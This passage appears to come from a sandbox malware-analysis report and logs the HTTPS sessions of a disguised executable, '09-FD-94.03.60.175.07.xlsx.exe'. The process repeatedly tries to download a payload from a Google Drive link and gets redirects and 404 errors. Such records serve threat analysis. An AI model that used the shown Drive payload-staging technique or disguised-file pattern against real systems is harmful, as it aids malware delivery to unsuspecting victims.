                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4d 69 47 34 63 58 30 6a 38 32 71 2d 38 69 33 5a 74 30 64 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hMiG4cX0j82q-8i3Zt0daA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.849714172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:52 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:53 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-_7Au-6Svi2ShC7pPt6BY0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.849715142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:55 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:56 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5T54kqLTEwunHgUPdaz6pUFI6X0YMkjxC5u4osWLlhWlHDDjC9O9ycICCF7yT4TGgB
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:55 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-t9AKfqNhO7sj8GIw9ym2EA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:57:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 48 68 5f 4c 42 77 6d 48 74 44 33 47 54 5f 77 61 76 47 4a 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FHh_LBwmHtD3GT_wavGJOA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.849716172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:57 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:57:58 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-FJaJtobr5UzRONb7Bgmr-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.849717142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:00 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:01 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4vVjoIim0YxDVexvmkjvQhK_A4gqJrul5voHTdbvq5TMtaCfuehoNascKx_5m3Rz-a
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:01 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-xAPF-d_0sRNahErAT3pozQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 70 43 52 31 37 64 78 5a 34 5a 62 43 51 41 30 32 69 35 70 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hpCR17dxZ4ZbCQA02i5pTw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.849718172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:03 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:04 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-y8flBZiIulY4L9q4XGw8PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.849719142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:06 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:07 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4ta_CaXtC6lLUGYMlr04C777LnIJVsBez3oHI8R02QCpL_I_bw84ygkOOCzszDTKFo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:06 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-WU6cB3O4QjibIAQpY59wuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6b 79 34 74 55 71 4f 77 6a 4b 7a 33 65 6f 6e 73 48 32 4b 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Uky4tUqOwjKz3eonsH2K4g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.849720172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:09 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-_LPpUbIR7Uj50t1sj4DseQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.849721142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:12 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
